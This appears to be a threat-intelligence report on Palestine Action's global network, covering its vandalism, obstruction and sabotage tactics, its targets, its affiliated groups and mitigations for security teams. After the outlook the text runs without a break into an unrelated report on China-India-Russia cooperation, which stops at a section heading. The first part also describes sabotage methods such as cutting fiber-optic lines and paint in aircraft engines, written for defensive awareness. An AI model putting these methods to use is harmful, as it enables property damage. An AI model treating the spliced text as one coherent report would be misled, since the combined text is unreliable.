Groups in Palestine Action’s network in North America, Europe, and Australia — as detailed below — are very likely to increase their operational tempo in response to the UK proscription of Palestine Action and ongoing developments in the Israel-Hamas conflict. In the short term, the frequency of direct action conducted by groups in Palestine Action’s global network is likely to outpace the parent organization in the UK, as it is likely to continue its de facto moratorium on sabotage and vandalism while it attempts to legally appeal its proscription. Nevertheless, Palestine Action will very likely attempt to continue providing support to its international network through organizing trainings for activists, sharing instructional material, and using its platform to advertise the activities of the network around the world.

Palestine Action’s Tactics, Techniques, Procedures, and Targets

Palestine Action’s UK branch and its global network almost certainly rely on standard operating procedures for conducting attacks against facilities to disrupt the business operations of their intended targets. Specifically, DVEs associated with the group almost certainly prefer TTPs for attacks that are described in Palestine Action’s 2023 instructional guide to carrying out militant direct actions in support of the group’s objectives. Namely, Palestine Action and its global network have frequently and repeatedly used the same vandalism, physical obstruction, and sabotage TTPs in operations, as described in the following section. DVEs with a nexus to Palestine Action very likely select which TTP to employ in operations based on their level of access to the targeted facility in question, conducting more destructive and sophisticated attacks when they are able to gain interior access.

Across the globe, Palestine Action and similar groups’ almost certainly primary targets are the offices of defense contractors that have perceived relationships with the IDF or the Israeli government. In the UK and Western Europe, Elbit and its subsidiaries and partners have been most frequently targeted in Palestine Action attacks. However, due to the global footprint of Palestine Action’s network and the expansion of the Israel-Hamas conflict since October 2023, Palestine Action and similar groups have also attacked entities in other sectors that are perceived to be doing business with the IDF, the Israeli government, or Elbit. Aside from defense contractors and governments, the most frequently targeted industry sectors are insurance, banks and financing, logistics, and shipping.

Direct Action TTPs

Palestine Action almost certainly uses physical attack TTPs that are intended to maximize the degree of economic disruption and damage to targeted facilities, but minimize the risks of harm to individuals and detection by law enforcement. By imposing financial cost on targeted companies during operations, Palestine Action almost certainly seeks to convince the targeted entity to sever its relationships with the IDF or Israeli government. Insikt Group associates the following overarching TTPs with attacks perpetrated by Palestine Action or its global network:

• Palestine Action operations are typically carried out by small cells, mostly consisting of fewer than five activists.
• Palestine Action conducts targeted operations against facilities outside of business hours to maintain operational security and minimize the risks of harm to personnel or the identification/detection of its operatives.
• Palestine Action operations aim to impose substantial financial costs to targeted entities through rudimentary, low-sophistication methods.
• Palestine Action operatives prefer vandalism, obstruction, and sabotage as TTPs; which TTP is selected is very likely contingent on the degree of access to the facility.
  • If operatives cannot gain entry to the facility, they will very likely prefer to vandalize the exterior of the facility or attempt to block external entry.
  • If operatives are able to gain internal access to the facility — usually by identifying and exploiting potential access points during pre-attack reconnaissance or by using physical force to enter — they will very likely attempt to sabotage infrastructure inside the facility.

Vandalism

Almost all observed Palestine Action operations involve vandalism of the exterior of targeted facilities, with two types of actions especially prominent. First, DVEs affiliated with Palestine Action have frequently used red spray paint to either indiscriminately color or write messages on the facades of targeted facilities, or, by dispersing paint through a fire extinguisher, blanketing the exterior or interior of a facility with red paint. Second, these DVEs use tools or projectiles, including hammers, crowbars, blunt objects, and bricks, to destroy windows on the exterior of targeted buildings.

These vandalism methods are each attested to in Palestine Action’s official instructional guide as effective ways to “destrupt [sic], damage or destroy your target.” The manual also recommends that DVEs use the same vandalism TTPs to damage exterior surveillance systems in order to avoid detection during direct actions, or to destroy infrastructure such as air conditioning systems or pipes outside the facility to “sabotage the profits of your target even further.”

Figure 3: Evidence of vandalism TTPs from a February 2025 Palestine Action attack against an Allianz insurance office in Milton Keynes, UK (Source: Palestine Action)

Obstruction

Palestine Action operations have also used physical obstruction as a TTP to prevent access to targeted facilities. Unlike other attack TTPs associated with Palestine Action, the group has often used methods of obstructing facilities that are very unlikely intended to maintain the covert nature of the operation. Specifically, in some operations, Palestine Action cells have physically obstructed access to targeted facilities by forming a human blockade: sitting down, interlocking arms, blocking access to a main doorway, and on occasion chaining themselves together or to an immovable object (such as a vehicle or post). In a break from the patterns of other observed Palestine Action TTPs, activists have attempted blockades during normal business hours, mainly to prevent facility employees from entering the premises.

Figure 4: Palestine Action activists blockade a Lockheed Martin facility in Bedfordshire, UK, in a November 2023 protest (Source: BBC)

Palestine Action network groups — particularly in the United States (US) — have also experimented with more novel methods of facility obstruction that can be covertly conducted. Cells with a nexus to the US-based Palestine Action offshoot Unity of Fields (UoF), for instance, launched a campaign in the summer and fall of 2024 to target Citibank automated teller machine (ATM) locations in the New York and Los Angeles metropolitan areas due to the bank’s perceived support of Israeli interests. In addition to vandalizing the facilities, the cells inserted epoxy and affixed cement-glue stickers to exterior card-reader devices that were necessary to enter the facilities. Palestine Action’s instructional guide also calls for activists to use concrete to plug water or sewage pipes leading to targeted facilities, although Insikt Group has not observed Palestine Action operatives using this TTP.

Figure 5: Activists insert epoxy into a Citibank card reader in New York City on October 7, 2024 (Source: Unity of Fields)

Sabotage

Sabotage operations remain the most likely of the TTPs historically employed by Palestine Action to impose serious financial costs on the victims of its operations. While almost certainly relying on low-tech and low-sophistication methods, Palestine Action has caused millions of dollars in damages through sabotage operations, mainly to technology and other assets inside targeted facilities. In previous incidents, cells linked to Palestine Action have relied on the same toolkit used for vandalism and obstruction — large, blunt objects like crowbars and wrenches and fire extinguishers filled with paint — to sabotage their target. Activists almost certainly prefer these tools due to their low cost, ease of use, minimal profile, and the inability to trace their purchase; their use across the spectrum of Palestine Action’s TTPs likely suggests that activists are opportunistic, employing the toolkit in sabotage operations as opposed to vandalism or obstruction when they can exploit vulnerabilities in facility security.

The most notable and recent sabotage incident connected to Palestine Action was the aforementioned breach of RAF Brize Norton, the largest RAF base in the UK, on June 20, 2025. A video of this attack posted by the group shows activists approaching Airbus A330s on the base using electric scooters. They damaged the aircraft by spraying red paint through a fire extinguisher directly into the plane’s engines and striking the plane with crowbars. The attack caused approximately £7 million ($9.4 million) in damages to the aircraft, almost certainly due to the impact of the attack on sensitive parts and equipment inside the planes’ engines. The attack on RAF Brize Norton led to the arrest and indictment of five Palestine Action-linked activists and almost certainly prompted the UK terrorism designation of the group, as well as improvements to facility and perimeter security at the RAF base.

Figure 6: Palestine Action activists approach aircraft at RAF Brize Norton on electric scooters (Source: Palestine Action)

Palestine Action activists also deployed sabotage TTPs on several additional operations targeting defense contractors in the UK. In August 2024, a Palestine Action cell in Bristol breached an Elbit warehouse by piloting a van through perimeter fencing, entered the facility, and began sabotaging internal equipment within the facility with sledgehammers, axes, and other blunt instruments. In total, the operation caused over £1 million ($1.3 million) in damages; protesters also allegedly assaulted a security guard and law enforcement officers responding to the incident, prompting JTAC to label the attack as an “act of terrorism.” During a June 1, 2022, incident at a Thales Group facility in Glasgow, Palestine Action activists accessed the roof and entered the facility, destroying parts used for submarines with blunt instruments. In conjunction with the sabotage operation, two protesters glued themselves to the roof, likely attempting to obstruct access to the facility.

Targets

Palestine Action’s primary target in the UK has almost certainly been Elbit: the global defense contractor has been the most frequent victim of its attacks, the group’s propaganda and instructional material list Elbit as the group’s preferred target, and Palestine Action has launched branded campaigns designed specifically to encourage activists to attack Elbit facilities. As secondary targets, the group has conducted notable attacks against other public and private sector defense entities perceived to have some association with the Israeli military, namely the UK’s Ministry of Defence (MoD), Teledyne Technologies, Thales Group, Leonardo, and Rafael Advanced Defense Systems. According to its 2023 announcement and its post-October 7, 2023, activity, the group and its international network consider a range of entities in sectors that reportedly supply goods or services to Elbit or the Israeli military — including banks, financial institutions, insurance agencies, real estate brokers, accounting firms, human resources contractors, and international shipping and logistics companies — as legitimate targets for militant direct action. Direct actions have also targeted other UK government entities, including the UK Foreign and Commonwealth Office, the BBC, and the London Stock Exchange. Palestine Action almost certainly targets these companies with the goal of inflicting maximum financial and reputational damage through its operations, in order to convince companies to cease their business with Elbit or Israeli entities.

As the next section demonstrates, the international expansion of Palestine Action network groups adopting the UK branch’s modus operandi or TTPs has almost certainly broadened the range of secondary and tertiary targets that are likely to be affected by militant direct action campaigns. However, Palestine Action and its global network very likely share a focus on specific sectors — defense contracting, banking, insurance, and international shipping and logistics — that relevant groups and cells are likely to target regardless of their respective area of operations. Moreover, the TTPs Insikt Group associates with Palestine Action’s UK branch have almost certainly been adopted by its international counterparts, very likely due to the influence of Palestine Action’s militant direct action campaigns in the UK, instructional material, and training sessions for activists.

Palestine Action’s Global Network

Palestine Action’s global network consists of groups of activists around the world who share Palestine Action UK’s commitment to disrupting the normal business operations of entities partnered with the State of Israel through militant direct action. Some of these groups refer or have referred to themselves explicitly as “Palestine Action”; have direct relationships to the UK branch through their members, partners, or benefactors; choose identical targets, such as Elbit; or, like Palestine Action UK, are solely motivated by the anti-Israel cause. Others, despite lacking these relationships, have directly appropriated Palestine Action UK’s TTPs, targets, or other aspects of the organization to support their own operations.

We classify groups in Palestine Action’s global network based on which elements they share in common with the UK branch. As depicted in Table 1, our four-part classification labels Palestine Action network groups as either Palestine Action franchises, affiliates, offshoots, or partners, depending on whether they share areas of operation, motivating ideology, TTPs, or targets with the UK branch. These categories are not static and are subject to change over time, particularly as groups founded as Palestine Action franchises outside the UK adapt to the local landscape in their own countries and form their own brand. Table 1 additionally contains examples of each of the four categories of Palestine Action network groups, with the following subsections containing case studies of particularly notable franchise, affiliate, offshoot, and partner groups.

Table 1: Classification of Palestine Action global network groups (Source: Insikt Group)

Franchise: Palestine Action Italia/Palestina Libera (Italy)

Figure 7: Palestine Action Italia logo (Source: Palestine Action Italia)

Palestine Action Italia, more commonly known as Palestina Libera, is Palestine Action’s Italy-based franchise. On its website, the group directly identifies itself as “the Italian branch of the international ‘Palestine Action’ campaign, which in England directly led to the closure of three arms factories involved in the genocide in Gaza.” The group also uses similar branding as the UK branch, employs similar TTPs, and targets the same sectors, focusing largely on defense contractors with facilities in Italy. In particular, Palestina Libera’s direct actions have frequently targeted the Italy-based defense contractor Leonardo at its offices throughout the country, due to its joint ventures with Elbit.

The organization very likely emerged from pro-Palestinian activist factions in Italy that increasingly aligned with Palestine Action’s global network in the wake of the October 7, 2023, attack. While data in the Recorded Future Platform indicates the group’s website was registered on February 4, 2024, a 2008 issue of al-Majdal Magazine — the quarterly publication of the BADIL Resource Center for Palestinian Residency & Refugee Rights — indicates that the same domain was operated by an Italian pro-Palestinian organization, the Comitato di Solidarietà con il Popolo Palestinese, Torino [Committee for Solidarity with the Palestinian People in Turin, Italy]. Screenshots of the domain captured in the Wayback Machine indicate that between October 2010 and the website’s registration in February 2024, the site displayed a message indicating the administrator should “upload [their] website into the public_html directory.” This message almost certainly indicates that an administrator account was active during the interim, but that it had not uploaded any information onto the domain. The group’s active social media accounts were created in November and December 2023, respectively.

Following Palestine Action’s July 5, 2025, designation as a terrorist organization in the UK, Palestine Action Italia has likely become one of the organization’s most prioritized franchises. Palestine Action’s main website currently includes a link to donate to Palestina Libera, hosted on Palestina Libera’s website. This donation section uses the service provider Donorbox to facilitate transactions, with options for donors including sending €15 for “a little bit of paint,” €50 for “smoke bombs in action,” €100 for the “legal expenses fund,” or another amount determined by the donor. Palestina Libera has also very likely increased its operational tempo in the wake of the proscription, citing Palestine Action UK’s designation and the arrests of protesters at rallies in the UK as motivation for new direct actions. For instance:

• On October 3, 2025, Palestina Libera took part in pro-Palestine direct actions across Italy, protesting the Israeli government’s interception of the Global Sumud Flotilla. Activists very likely affiliated with Palestina Libera participated in occupations and blockades of major transportation and logistics infrastructure, including obstructing a runway at Pisa International Airport, occupying several highways in the Tuscany region, and blockading an Amazon Logistics facility in Brandizzo.
• On September 29, 2025, the group claimed to have blockaded a Leonardo facility in the town of Nerviano. In a social media post, it alleged that at least one Leonardo employee working at the facility joined its protest.
• On September 25, 2025, several of the group’s activists chained themselves together outside a Rheinmetall facility in Rome, which they claimed “hindered production” and “made the gate inaccessible for an entire work shift.”

Affiliate: Death to Toll (Australia)

Figure 8: Death to Toll logo (Source: Instagram)

“Death to Toll” is a campaign by anarchist violent extremists (AVEs) in Australia to conduct vandalism, obstruction, and sabotage against the Australian international logistics and shipping company Toll Group (Toll), its parent organization Japan Post Holdings, and defense contractors working with the Australian Defense Force (ADF), due to accusations that Toll and the ADF are partnering with the Israeli military. The group responsible for this campaign is classified as a Palestine Action affiliate, as it almost certainly shares Palestine Action UK’s ideology and uses TTPs promoted by the group, but operates solely in the Melbourne, Australia area and has chosen its own companies to target.

The first attack claimed by this group was a sabotage of a Heat Treatment Australia (HTA) facility on October 14, 2024; the campaign against Toll began with an obstruction of one of the company’s facilities in Melbourne on November 22, 2024. In an August 7, 2025, interview, Death to Toll’s organizers cited Palestine Action’s targeting of UK shipping organizations that partnered with Elbit as an inspiration for their attacks. They also have shared a copy of Palestine Action’s 2023 instructional guide on their website.

In recent months, the Death to Toll group has claimed responsibility for several acts of vandalism, obstruction, and sabotage targeting Toll:

• On October 7, 2025, AVEs claimed responsibility for intercepting a Toll fuel truck in Melbourne by obstructing a road with flaming objects. They subsequently spraypainted the truck with red graffiti.
• On August 31, 2025, AVEs claimed to have attacked a Toll facility in Dandenong South. A video posted to the group’s Instagram account shows activists smashing exterior glass doors of the facility with a blunt object and dousing them with a flammable liquid in a bottle, very likely gasoline.
• On August 11, 2025, AVEs claimed to have vandalized a Toll facility in Truganina, writing graffiti, spraying red paint, and damaging keycard access devices on the exterior of the facility. Toll confirmed the attack in a statement to the press, and Victoria Police indicated they were investigating the incident.

Beyond its website, the Death to Toll campaign operates a social media account and accepts submissions from independent AVEs for claims of responsibility and tips on potentially vulnerable facilities on a Mega file-sharing site and through a Proton Mail email address. The social media pages attributed to the group have frequently used the hashtags #socalledaustralia, #DeathToll, and #TheDeathTollisRising. On the front page of their website, the administrators have posted a call to action against industries in Australia that they perceive to be providing support for the IDF. Specifically, they claim that “all sites and equipment used or owned by Toll Holdings and its parent company, Japan Post, are legitimate targets for anti-genocide action. This includes sabotage, vandalism, blockades, strikes, occupations, and all forms of resistance and disruption. Everything is on the table.”

Offshoot: Unity of Fields (United States)

Figure 9: Unity of Fields logo (Source: Social Media)

Unity of Fields (UoF) describes itself as an “anti-imperialist propaganda front” that reports on the activities of militant pro-Palestinian activists in the US. In this regard, it functions in a similar fashion to AVE “counter-info” outlets, which provide AVEs in a specified geographic area with information pertaining to upcoming protests and demonstrations, claims of responsibility for AVE attacks, guides and instructional material for carrying out attacks, and communiqués from local AVE groups.

UoF was almost certainly founded as a Palestine Action franchise in the US: during its initial years of operation, it used the name “Palestine Action US,” was managed by a cell of activists who almost certainly founded the group with insight from Palestine Action UK members, and devoted itself to attacking Elbit facilities in the US using Palestine Action’s standard TTPs.

From October 7, 2023, to August 2024, Palestine Action US predominantly conducted vandalism, obstruction, and sabotage against Elbit facilities, particularly in Cambridge, Massachusetts, and Merrimack, New Hampshire. Calla Walsh — almost certainly one of Palestine Action US and UoF’s de facto leaders between October 2023 and July 2025 — was arrested and convicted for her role in a November 20, 2023, Palestine Action US attack on an Elbit facility in Merrimack.

In August 2024, following Walsh’s release from prison, Palestine Action US announced its rebranding as “Unity of Fields”, appropriating a concept from the Yemeni Houthi movement. The group subsequently renamed its social media and online messenger accounts, launched a new website dedicated to the group’s communiqués and instructional materials, and claimed the group’s new mission was to establish “a militant propaganda front against the US-NATO-zionist axis of imperialism.” In addition to claims of responsibility for attacks, the website also hosts a repository of instructional and ideological material, as well as publications produced by other AVE groups.

Autonomous pro-Palestinian activists across the US have sent several dozen claims of responsibility to UoF for publication claiming responsibility for operations against an array of targets, including defense contractors (including Magellan Aerospace, Rolls-Royce and MTU America, Lockheed Martin, Ghost Robotics Corporation, Leidos, and Israel Chemicals), banks (including Bank of America, Citibank, Wells Fargo, Chase Bank, and BNY Mellon), shipping and logistics companies (including Maersk and Amazon), US military recruitment centers, law enforcement infrastructure (particularly vehicles), university buildings and officials, public transportation, and construction buildings and equipment. Occasionally, DVEs from outside of the US — including other Palestine Action global network groups — send communiqués to UoF for publication. At the time of writing, the most recent claims of responsibility include:

• An August 7, 2025, communiqué claiming responsibility for an arson of several vehicles at a Lovitt Technologies plant in Melbourne, Australia
• A May 29, 2025, communiqué claiming responsibility for spraypainting several pro-Palestinian messages on a Maersk shipping container in Oakland, California
• A May 9, 2025, communiqué from protesters at the University of Washington that details the occupation of a university building

UoF has significantly decreased its output of new claims of responsibility since late July 2025, very likely because of internal disputes and a leadership transition within the group. On July 29, 2025, Calla Walsh reported on social media that she was “no longer part of” UoF after a dispute over the “direction in which the project is going,” following which Walsh reported “the organization purged me” and that she had “complied with the decision and transferred them ownership of the accounts.” While Insikt Group is unaware of the exact nature of this dispute, Walsh’s departure from UoF directly followed a July 2025 trip she made to Iran, where she participated in an event hosted by the World Service of the Islamic Republic of Iran Broadcasting (IRIB), Iran’s government-operated media agency. In an October 5, 2025, article on her Substack page, Walsh reported that she had been detained by US Customs and Border Protection (CBP) officers at New York’s John F. Kennedy International Airport following her return from Tehran.

Partner: Shut the System (United Kingdom)

Figure 10: Shut the System logo (Source: Social Media)

Unlike other groups included in this report, which are predominantly motivated by the Palestinian cause, Shut the System is a UK-based environmental violent extremist (EVE) group that likely emerged as an offshoot of the UK climate activist group Extinction Rebellion (XR). However, the group has also almost certainly conducted pro-Palestinian direct actions. In addition, Shut the System has also directly collaborated with Palestine Action in the UK, almost certainly due to substantial overlaps between Palestine Action’s and Shut the System’s TTPs, preferred targets, and areas of operation. For instance, Shut the System frequently targets insurers and banks that it claims provide services to major global fossil fuel extraction projects; Palestine Action has also targeted many of the same companies on the grounds that they provide services to the IDF or Israeli government. Both groups also frequently use vandalism with red paint, projectiles, or blunt objects to deface the facade of target properties, as well as sabotage, although Shut the System has very likely deployed more sophisticated methods of infrastructure sabotage than Palestine Action. Overall, Shut the System fits the profile of a Palestine Action partner organization.

The first reported Shut the System operation took place in late February 2024. During 2024, the group predominantly conducted vandalism targeting the London offices of insurance companies, such as AIG, Probitas 1492, Chubb, Liberty General, Lloyd’s of London, Markel UK, QBE, Tokio Marine, as well as Barclays, using red paint, graffiti, and projectiles. In a January 2025 communiqué, Shut the System claims to have selected these companies as targets because they were identified in a November 2023 article from Insurance Business Magazine as among the top ten insurers of fossil fuel extraction projects in the world. On June 10, 2024, Shut the System and Palestine Action conducted a joint, UK-wide operation targeting Barclays bank branches in Birmingham, Bristol, Brighton, Edinburgh, Exeter, Glasgow, Lancashire, London, Manchester, Northampton, Sheffield, and Solihull. Activists from both groups sprayed red paint on the exterior of the branch facilities and smashed their windows with projectiles.

Subsequently, the group has very likely expanded its targeting aperture to include conservative think tanks, additional financial services providers, and events for defense contractors, posting claims of responsibility for attacks on its websites and social media profiles. Shut the System’s website also contains instructions on how to conduct vandalism, obstruction, and sabotage on behalf of the group, and provides a list of 38 banks and insurance companies that it identifies as priority targets due to their alleged financing of the fossil fuel industry. The group continues to conduct joint operations with a number of UK-based AVE and EVE cells, including cells affiliated with almost certain Palestine Action offshoot groups. For instance, during the past several months, Shut the System claims to have collaborated with pro-Palestinian militant direct action groups during the following operations:

• On October 8, 2025, Shut the System’s “Palestine solidarity faction” and activists from the UK group Palestine Pulse claimed to have used projectiles and blunt instruments to destroy “entrances, glass panels, security cameras and ID card readers” at a Palantir Technologies facility in London. They additionally claimed to have sprayed red paint on the building’s facade.
• On September 29, 2025, Shut the System claimed to have conducted a joint operation with Shut Elbit Down and French and German XR affiliate groups to target Barclays and BlackRock assets throughout the UK and Europe. Activists sprayed red paint outside of Barclays offices in Paris, France, and Hamburg, Germany, and a BlackRock office in Vienna, Austria, and “superglued locks of [Barclays] branches across the UK.” Additionally, Shut the System stated it targeted two Barclays senior executives in the UK by spraying red paint outside of their personal residences, and sending letters to the executives’ neighbors “inviting them to a cocktail party hosted by the [executive] where they can explain why they have no conscience.”
• On September 8, 2025, Shut the System claimed to have severed fiber-optic cables leading to the London offices of Clarion Events, the company responsible for hosting the Defence and Security Equipment International (DSEI) defense trade exhibition. It conducted the action as part of a campaign, “Shut DSEI Down,” that aimed to protest the trade exhibition due to the participation of several defense contractors that pro-Palestinian activists argue provide armaments to the IDF.

From January 2025 onward, Shut the System frequently used a physical attack TTP that we have not observed in the operations of other Palestine Action global network groups, namely, sabotaging communications infrastructure by cutting fiber optics lines. Instructions on Shut the System’s website demonstrate how to identify fiber optic cable boxes outside of target facilities, locate the correct wires, and sever them to disrupt internet and other communications services to the building. Between August 18 and September 31, 2025, Shut the System launched a campaign titled “Summer of Sabotage” in which it encourages activists to use these and other sabotage TTPs to target banks and financial industry entities.

Mitigations

The decentralized nature of individual Palestine Action cells entails that activists very likely plan operations in closed or encrypted communications channels that are almost certainly inaccessible to individuals who have not established their bona fides with the group. The groups’ official communications announce operations after the fact; they almost certainly will not provide indicators and warnings (I&W) of planned activities.

To diminish risks from physical threat activities conducted by Palestine Action’s global network, organizations and their physical security teams should focus on mitigating the effects of attacks by implementing the following approaches. Overall, physical security measures should aim to deny Palestine Action operatives interior access to facilities. The most costly attacks perpetrated by the group — including the June 2025 attack on RAF Brize Norton — took place after activists were able to breach secure perimeters, enter facilities, and sabotage assets stored inside perimeters.

• Recorded Future customers can leverage the Recorded Future Intelligence Operations Platform to monitor communications sources connected to Palestine Action and its global network, in order to determine evolutions in trends in targeting and TTPs and an organization’s overall risk level.
• Customers can use the Recorded Future Platform’s Intelligence Cards, Advanced Query Builder, and Insikt Group reporting to track ongoing global events — such as the Israel-Hamas conflict or the status of Palestine Action’s legal battle against its terrorism designation in the UK — that are likely to affect threat actors’ operational tempo and targeting aperture.
• Integrate this report and other Insikt Group assessments of DVE threat actors’ TTP and targeting into structured tabletop exercises for physical security teams.
• Review and, where necessary, implement governmental guidelines for physical protection of business facilities, particularly with regard to electronic surveillance, secure lighting, and security personnel.
• Conduct vulnerability assessments to enable effective contingency and resiliency planning in the event of an incident of vandalism, obstruction, or sabotage, with particular focus on a successful incident disrupting communications, transportation, and energy infrastructure.
• Limit voluntary publication of information about the functions, layout, and location of critical infrastructure assets at facilities, or security measures at a facility, beyond the levels necessary to comply with legal or regulatory requirements.

Outlook

While Palestine Action’s branch in the UK continues the ongoing legal appeal of its terrorism designation — very likely until the designation is rescinded or all of its legal options are exhausted — Palestine Action’s global network is very likely to escalate the frequency and scope of its militant direct action operations. In the short to medium term, the formation of new Palestine Action global network groups in North America, Western Europe, Australia, and elsewhere around the world is likely, threatening an increased range of organizations in defense contracting, banking, finance, insurance, and shipping and logistics sectors.

Extant groups linked to Palestine Action are also likely to traverse the various categories of groups described in this report, with cells inside the UK attempting to separate themselves from the Palestine Action brand to avoid legal scrutiny and cells outside the UK highlighting their connections to Palestine Action to build credibility with AVEs and the pro-Palestine activist movement. As such, we expect existing franchises and affiliates in the UK to increasingly become offshoots and partners while the ban is in effect; the reverse is likely in geographic areas outside the UK where Palestine Action is not a designated terrorist organization.

Volatile dynamics in the Israel-Hamas conflict and the situation in the Gaza Strip are also very likely to influence Palestine Action’s global network in the short to medium term, especially with regard to the frequency of attacks. At the time of writing, a ceasefire between Israel and Hamas, effective October 10, 2025, remains in effect. While the establishment of the ceasefire likely did not stop Palestine Action network groups from conducting operations — several of the groups profiled in this report have carried out attacks in the interim — any potential breakdown in the ceasefire would very likely augur increased Israeli military activity in the Gaza Strip that has historically caused upticks in attacks related to the network.

Insikt Group assesses that the August 2025 meeting of Chinese Communist Party (CCP) General Secretary Xi Jinping, Indian Prime Minister Narendra Modi, and Russian President Vladimir Putin at the Shanghai Cooperation Organization (SCO) Summit likely suggests early interest among the three states to explore trilateral cooperation, though the formation of a resilient bloc remains unlikely.

United States (US) policy –– particularly the level of sanctions the US places on each country –– is likely one of the primary factors driving the three states to change their level of cooperation. An increase in US sanctions is likely to drive each state to pursue alternative markets; this motivation has led to an acceleration of trilateral cooperation in some areas, and a reduction in others. For example, President Donald Trump’s decision to impose tariffs on India in mid-2025 very likely amplified a warming China-India relationship and reinforced a stable India-Russia relationship. In contrast, US sanctions on Russian oil companies in October 2025 led China and India to decrease their level of Russian oil imports.

The second factor driving Russia, India, and China to explore trilateral cooperation is very likely their shared strategic interest in a multipolar global order — manifest through fora like SCO and BRICS (Brazil, Russia, India, China, and South Africa).

However, despite nascent trilateral cooperation, there remains significant divergence among the three countries’ foreign policy goals, governing principles, and economic ambitions, which likely limits the scope of their cooperation. The political, economic, and military dynamics that shape bilateral relationships between China-Russia, China-India, and India-Russia are complex and distinct. Of those relationships, challenges between Beijing and New Delhi are almost certainly the greatest barrier to the formation of a trilateral bloc or alliance. In particular, India’s competition with China for Asia-Pacific regional leadership and influence, a large trade deficit favoring China, and unresolved border disputes will very likely temper the depth of cooperation between the two. All three countries seek to create an alternative center of gravity to the West, but India does not share Russia’s or China’s staunchly anti-Western worldview.

Although BRICS and SCO almost certainly represent viable opportunities for the three countries to foster trilateral cooperation, significant limitations prevent deeper alignment within these fora. The Russia-India-China (RIC) dialogue format, if rejuvenated, would offer the most likely format to formalize trilateral alignment. Insikt Group identified a range of potential indicators that are likely to reflect a coalescence into a political, economic, or military bloc.

Deepening trilateral coordination would almost certainly have broad implications for both the public and private sectors, depending on the depth and intensity of the cooperation. For example, the formation of trilateral economic frameworks, such as lower trade barriers or coordinated regulatory schemes, would force private sector companies operating in any of these countries to adapt to new regulatory standards and potentially face increased competition from an enlarged trilateral economic market. Deeper defense cooperation could lead to shifts in the defense industry of each country, as markets adjust to serve the defense needs of each member of the trilateral. If this leads Chinese and Indian defense industries to increasingly look to serve Russian defense needs, it could force companies that currently produce dual-use technologies for China and India to make adjustments to avoid transacting with sanctioned Russian defense entities.

Key Findings

• The single greatest impediment to trilateral cooperation is very likely the deep distrust between China and India, which underpins political, economic, and military competition — including a decades-long border dispute. India’s doctrine of strategic autonomy and its pursuit of “multi-alignment” are likely to limit its willingness to join a formal trilateral bloc with China and Russia that is explicitly positioned as a counterweight to the West.
• However, all three states very likely share a desire for a multipolar world that includes more developed regional centers of power. This likely helps drive trilateral cooperation to avoid US influence that threatens the strategic interests of Russia, China, and India.
• The nearly decade-long strategic partnership between Moscow and Beijing is likely a key factor driving trilateral cooperation, as Russia and China have shared experience developing alternative centers of power to the West. Both states are likely motivated to convince India to adopt a similar strategy.
• An increase in US sanctions and tariffs is very likely to be a primary factor driving greater trilateral cooperation, as all three states seek alternative markets and China and India likely aim to avoid secondary sanctions. In contrast, Western government policies that facilitate China’s and India’s access to Western markets are likely to lessen Beijing’s and New Delhi’s incentive to deepen trilateral economic cooperation.
• Deepened trilateral economic cooperation very likely would increase the prospect that Western companies — especially those operating in India — see heavier state involvement in the private sector and greater Western scrutiny of Indian economic transactions to catch sanctions violations, as New Delhi aligns its practices with Moscow and Beijing.

Background: US Policy Likely Driving Nascent Cooperation Among China, India, and Russia

We assess that there are early signs of cooperation among India, China, and Russia in recent months and that this cooperation is likely to expand, driven primarily by an emerging thaw in China-India relations. Against the backdrop of strong India-Russia and China-Russia relations, this warming of China-India relations likely increases the prospect of a deeper trilateral relationship. However, a formal China-India-Russia bloc has not yet formed, and significant limitations –– particularly around Beijing-New Delhi tensions –– are likely to challenge such an alignment.

India has likely calculated that the US’s 50% tariff on Indian exports –– imposed on India in August 2025, comprising a 25% reciprocal tariff and a 25% “penalty” tariff due to India purchasing sanctioned Russian oil –– necessitates looking for alternative markets and deepening foreign partnerships to recoup lost revenue and reinforce relationships India likely views as more reliable, including cultivating its relationship with Beijing. On August 6, 2025, one day before the US imposed a 50% tariff on Indian exports to the US, the Indian Ministry of External Affairs called the US’s decision “unfair” and “unjustified” and vowed that India would “take all actions necessary to protect its national interests.” India has specifically highlighted the inconsistency in the US’s application of a penalty tariff on India for importing Russian oil, while other countries, “even those with more adversarial relations with Russia,” have also sourced oil from Russia. China’s increasing oil imports from Russia likely reinforced to New Delhi that the US’s tariff policy was unjust. Indian officials are reportedly monitoring the US Supreme Court case (challenging the Trump administration’s tariffs) to determine its impact on current US-India trade negotiations. A breakthrough in trade talks would likely improve, but not entirely repair, the deteriorating diplomatic and economic ties between India and the US.

The US tariffs have likely also reinforced an emergent reconciliation between India and China. In August 2025, Chinese Foreign Minister Wang Yi visited New Delhi for the first time in three years. Beijing likely sees economic and political benefit to deepening ties with India, including exploiting the Indian market for Chinese exports and curbing US influence in South Asia. China’s trade surplus with India and status as the top exporter of electronics, telecommunications, and machinery to India likely give Beijing economic leverage in negotiations with India, particularly as India looks to recoup revenue lost due to US tariffs.

Following Modi’s August 31, 2025, meeting with Xi –– Modi’s first visit to China in seven years, at the SCO Summit in Tianjin –– Modi stated that “a stable relationship and cooperation” between China and India was critical for “the growth and development of the two countries, as well as for a multipolar Asia befitting the trends of the 21st century.” Amid India’s stated frustration over US tariffs, the highly publicized friendly interaction between Modi, Xi, and Putin (Figure 1) at the SCO Summit sparked concerns over an emergent Russia-India-China troika.

Figure 1: Photo posted by Modi of himself with Putin and Xi at the SCO Summit

on August 31, 2025 (Source: Social Media)

The nascent warming of China-India relations likely makes deeper trilateral cooperation among China, India, and Russia more probable, as China and Russia, as well as India and Russia, already have strong relations. Thus, a warming China-India relationship ameliorates the biggest barrier to the formation of a trilateral dynamic. In addition, all three states likely see political and economic benefits to deepening cooperation.

Areas of Bilateral Intersection and Divergence Among China, India, and Russia

Deepening trilateral cooperation among China, India, and Russia likely serves the strategic foreign policy interests of each state, though the trajectory of any fully formed trilateral dynamic is likely to be shaped by nuanced differences among each state’s foreign policy, as well as the bilateral dynamics within this group.

China’s Foreign Policy

China’s foreign policy toward Russia and India is almost certainly an outgrowth of the country’s primary strategic objectives. These include China’s “core interests,” such as preserving the CCP’s political power, territorial integrity, and economic development, as well as China’s efforts to shape a “multipolar” world, which almost certainly entails independence from US coercion, an increase in China’s international influence, and greater global dependence on China. China very likely sees greater cooperation with Russia and India as supporting these goals, especially in relation to Beijing’s main perceived threat — the US. In particular, China almost certainly considers Russia a political, economic, and military partner that helps legitimize China’s narratives about the need for multipolarity and bolster its ability to defend itself from US coercion. China likely considers India an important economic partner and judges that frayed India-US relations diminish the US’s efforts to encircle and contain China.

India’s Foreign Policy

